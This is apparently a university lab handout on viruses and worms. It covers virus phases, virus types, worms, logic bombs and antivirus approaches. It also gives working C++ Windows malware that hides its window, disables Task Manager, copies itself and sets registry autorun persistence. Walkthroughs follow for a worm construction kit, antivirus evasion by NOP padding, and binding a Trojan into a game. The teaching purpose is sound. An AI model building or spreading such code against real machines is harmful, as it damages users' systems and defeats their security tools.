Virus and Worms - site.iugaza.edu.pssite.iugaza.edu.ps/hradi/files/Lab-14-Virus.pdfTo know more...
Transcript of Virus and Worms - site.iugaza.edu.pssite.iugaza.edu.ps/hradi/files/Lab-14-Virus.pdfTo know more...
Internet Security ECOM 5347 Lab 14 Viruses & Worms
136
Virus and Worms
Objectives To know more about computer malicious code and how does it works.
Computer Virus:
Briefly we can defined computer virus as a program that inserts
itself into one or more files and then performs some (possibly null)
action.
The first phase, in which the virus inserts itself into a file, is called the
insertion phase. The second phase, in which it performs some action, is
called the execution phase. The following pseudocode fragment shows
how a simple computer virus works.
Beginvirus:
if spread-condition then begin
for some set of target files do begin
if target is not infected then begin
determine where to place virus instructions
copy instructions from beginvirus to endvirus
into target
alter target to execute added instructions
end;
end;
end;
perform some action(s)
goto beginning of infected program
endvirus:
As this code indicates, the insertion phase must be present but need not
always be executed. For example, a virus that infect boot file would
check for an uninfected boot file (the spread-condition mentioned in the
pseudocode) and, if one was found, would infect that file (the set of
target files).
Another description for virus lifetime divides it to four phases:
1. Dormant phase: The virus is idle. The virus will eventually be
activated by some event, such as a date, the presence of another
Internet Security ECOM 5347 Lab 14 Viruses & Worms
137
program or file, or the capacity of the disk exceeding some limit.
Not all viruses have this stage.
2. Propagation phase: The virus places an identical copy of itself into
other programs or into certain system areas on the disk. Each
infected program will now contain a clone of the virus, which will
itself enter a propagation phase. Virus propagation requires
human activity such as booting a computer, executing an AutoRun
on a CD, or opening an email attachment.
3. Triggering phase: The virus is activated to perform the function for
which it was intended. As with the dormant phase, the triggering
phase can be caused by a variety of system events, including a
count of the number of times that this copy of the virus has made
copies of itself.
4. Execution phase: The function is performed. The function may be
harmless, such as a message on the screen, or damaging, such as
the destruction of programs and data files.
Types of Viruses
Viruses take many different forms. The following lines introduce
common types and explain how they work. These are the most, but this
isn’t a comprehensive list.
Parasitic virus: The traditional and still most common form of virus. A
parasitic virus attaches itself to executable files and replicates, when the
infected program is executed, by finding other executable files to infect.
Polymorphic virus: A virus that mutates with every infection, making
detection by the "signature" of the virus impossible. This type of viruses
encrypt parts of itself to avoid detection. When the virus does this, it’s
referred to as mutation
Metamorphic virus: As with a polymorphic virus, a metamorphic virus
mutates with every infection. The difference is that a metamorphic virus
rewrites itself completely at each iteration, increasing the difficulty of
Internet Security ECOM 5347 Lab 14 Viruses & Worms
138
detection. Metamorphic viruses my change their behavior as well as
their appearance.
Armored virus: an armored virus is designed to make itself difficult to
detect or analyze. Armored viruses cover themselves with protective
code that stops debuggers or disassemblers from examining critical
elements of the virus. The virus may be written in such a way that some
aspects of the programming act as a decoy to distract analysis while the
actual code hides in other areas in the program.
Companion virus: A companion virus attaches itself to legitimate
programs and then creates a program with a different filename
extension. This file may reside in your system’s temporary directory.
When a user types the name of the legitimate program, the companion
virus executes instead of the real program. This effectively hides the
virus from the user. Many of the viruses that are used to attack
Windows systems make changes to program pointers in the Registry so
that they point to the infected program. The infected program may
perform its dirty deed and then start the real program.
Multipartite virus: A multipartite virus attacks your system in multiple
ways. It may attempt to infect your boot sector, infect all of your
executable files, and destroy your application files. The hope here is that
you won’t be able to correct all the problems and will allow the
infestation to continue. The multipartite virus in Figure 2.17 attacks your
boot sector, infects application files, and attacks your Microsoft Word
documents.
Figure 1 Multipartite Virus
Internet Security ECOM 5347 Lab 14 Viruses & Worms
139
Retrovirus: A retrovirus attacks or bypasses the antivirus software
installed on a computer. You can consider a retrovirus to be an anti-
antivirus. Retroviruses can directly attack your antivirus software and
potentially destroy the virus definition database file. Destroying this
information without your knowledge would leave you with a false sense
of security. The virus may also directly attack an antivirus program to
create bypasses for itself.
Stealth virus: A stealth virus attempts to avoid detection by masking
itself from applications. It may attach itself to the boot sector of the
hard drive. When a system utility or program runs, the stealth virus
redirects commands around itself in order to avoid detection. An
infected file may report a file size different from what is actually present
in order to avoid detection. Figure 2.19 shows a stealth virus attaching
itself to the boot sector to avoid detection. Stealth viruses may also
move themselves from fileA to fileB during a virus scan for the same
reason.
Figure 2 Stealth Virus
Phage virus: a phage virus modifies and alters other programs and
databases. The virus infects all of these files. The only way to remove
this virus is to reinstall the programs that are infected. If you miss even a
single incident of this virus on the victim system, the process will start
again and infect the system once more.
Worms
A worm is a program that can replicate itself and send copies from
computer to computer across network connections. Upon arrival, the
worm may be activated to replicate and propagate again. In addition to
propagation, the worm usually performs some unwanted function. Early
worms filled up memory and bred inside the RAM of the target
Internet Security ECOM 5347 Lab 14 Viruses & Worms
140
computer. Worms can use TCP/IP, e-mail, Internet services, sharing
folders or any number of means to each of their target
A worm is different from a virus in that it can reproduce itself, it’s self-
contained , and it doesn’t need a host application to be transported.
Many of the so-called viruses that have made the papers and media
were, in actuality, worms and not viruses. However, it’s possible for a
worm to contain or deliver a virus to a target system.
Logic Bomb
The logic bomb is code embedded in some legitimate program that is set
to "explode" when certain conditions are met and performs an action
that violates the security policy. Examples of conditions that can be used
as triggers for a logic bomb are the presence or absence of certain files,
a particular day of the week or date, or a particular user running the
application. Once triggered, a bomb may alter or delete data or entire
files, cause a machine halt, or do some other damage.
Example:
In the attack depicted in Figure 2.20, the logic bomb sends a message
back to the attacking system that it has loaded successfully. The victim
system can then be used to initiate an attack such as a DDoS attack, or it
can grant access at the time of the attacker’s choosing.
Figure 3
Internet Security ECOM 5347 Lab 14 Viruses & Worms
141
Bacteria, or rabbit programs, make copies of themselves to
overwhelm a computer system's resources. Bacteria do not explicitly
damage any files. Their sole purpose is to replicate themselves. A typical
bacteria program may do nothing more than execute two copies of itself
simultaneously on multiprogramming systems, or perhaps create two
new files, each of which is a copy of the original source file of the
bacteria program. Both of those programs then may copy themselves
twice, and so on. Bacteria reproduce exponentially, eventually taking up
all the processor capacity, memory, or disk space, denying the user
access to those resources.
Antivirus Approaches
The ideal solution to the threat of viruses is prevention: Do not allow a
virus to get into the system in the first place. This goal is, in general,
impossible to achieve, although prevention can reduce the number of
successful viral attacks. The next best approach is to be able to do the
following:
Detection: Once the infection has occurred, determine that it has
occurred and locate the virus.
Identification: Once detection has been achieved, identify the
specific virus that has infected a program.
Removal: Once the specific virus has been identified, remove all
traces of the virus from the infected program and restore it to its
original state. Remove the virus from all infected systems so that
the disease cannot spread further.
Internet Security ECOM 5347 Lab 14 Viruses & Worms
142
Lab Experiment Requirements:
We need only one machine in this experiment to built our malicious code and
run it.
Procedures :
Part 1 : Writing your virus (Using C++):
Code #include <windows.h>
#include <iostream>
using namespace std;
int main ( )
{
//----------------1--------------------
AllocConsole();
ShowWindow (FindWindowA("ConsoleWindowClass",NULL),0);
//----------------2--------------------
HKEY hKey;
unsigned char reg[2] = "1";
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\
CurrentVersion\\Policies\\system",&hKey);
RegSetValueEx(hKey,"disabletaskmgr",0,REG_DWORD,reg,sizeof(reg
));
RegCloseKey(hKey);
//------------------3------------------
char windir[MAX_PATH];
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\code.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] = windir+"";
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersi
on\\Run",0,KEY_SET_VALUE,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersio
n\\Run",0,KEY_SET_VALUE,&hKey2 );
Internet Security ECOM 5347 Lab 14 Viruses & Worms
143
RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
//------------------4------------------
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH, path, 255);
CopyFile(path,"C:\\code.exe",FALSE);
system("pause");
return 0;
}
For the above code : (each number below is corresponding to number in comment in
code):
1- This code hide the resultant virus window that must be displayed when you
run any application normally.
2- This part of code create a new registry key named disabletaskmgr in the path
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system in
HKEY_CURRENT_USER to disable task manager (ctrl+alt+delete) , we assign
value 1 to new registry key.
Method RegCreateKey create new key and RegSetValueEx set the value for
the specified key.
3- In this part we copy our malicious code to a path so that it can be run at
startup; For the code below we get path of windows folder using
GetWindowsDirectory method , we obtain module handle name by
GetModuleFileName and copy it to system32 folder in windows directory by
CopyFile method ; then we create a registry key in
Software\\Microsoft\\Windows\\CurrentVersion\\Run to run this
code when the computer starts or logon.
4- Last part of code , we use to copy our code in different paths so that it is
difficult to erase ,this part to spread your virus code you can add more
CopyFile statement.
Part 2: Hiding Viruses
Internet Security ECOM 5347 Lab 14 Viruses & Worms
144
Virus construction Kit :
- After running the construction kit, specify the name of your worm before you shift to other options .The main interface of this kit is shown in figure 4, figure 5 also display backup options where path and registry key will this worm reside.
Figure 4
Figure 5
- If you want to spread your worm via outlook (if your victim use outlook) ; you can determine a message title and body; you can configure from Outlook Options the same thing you can configure other spreading options such P2P.
Internet Security ECOM 5347 Lab 14 Viruses & Worms
145
- Now choose the action you want to perform from the list that included in
Payload Options; let us choose Run File/Link and type www.iugaza.edu.ps, payload options available by this tool is listed in figure 6.
Figure 6
- The last thing is determine when your action will tack place form Payload Trigger Options figure 7; you can choose on execution as an example; then click construct worm.
Figure 7
- When you run the resultant worm the result as the figure 8.
Internet Security ECOM 5347 Lab 14 Viruses & Worms
146
Figure 8
Stealth Tools : We can use this tool to hide viruses and malwares also Trojans from antivirus
software. - First of all determine the file you want to use as virus . - Add Bytes : it is add white bytes = NOP instruction ; it is useful to throwing
off antivirus software ; figure 9 shows the interface of this tool and simple configuration of add bytes option. Test the file size before and after adding NOP operation? Open the produced file using any text editor and see NOP operation.
Internet Security ECOM 5347 Lab 14 Viruses & Worms
147
Figure 9
- Another method to hide your malicious code is binding file with another executable file to create single executable file as shown in figure 10.
Figure 10
Internet Security ECOM 5347 Lab 14 Viruses & Worms
148
Eliterwrap Tool: Another tool we can use to hide executable files is eliterwrap ; this tool allow
you to hide executable file (malicious code : Trojan or virus) in legal one as solitaire
game as example.
By this tool we can embed tool such NetCat (refer to NetCat lab) and we specify the
command to execute when running the file in Enter command line step, with
another executable file.
Figure 11 shows hiding Trojan named patch with solitaire spider to produce
executable file named play.exe.
Figure 11
Exercise: Write a virus code in c++ to disable regedit and run on startup ; hide your
code in any method . In your opinion what is the effective way to hide the
code to be away of antivirus discovery.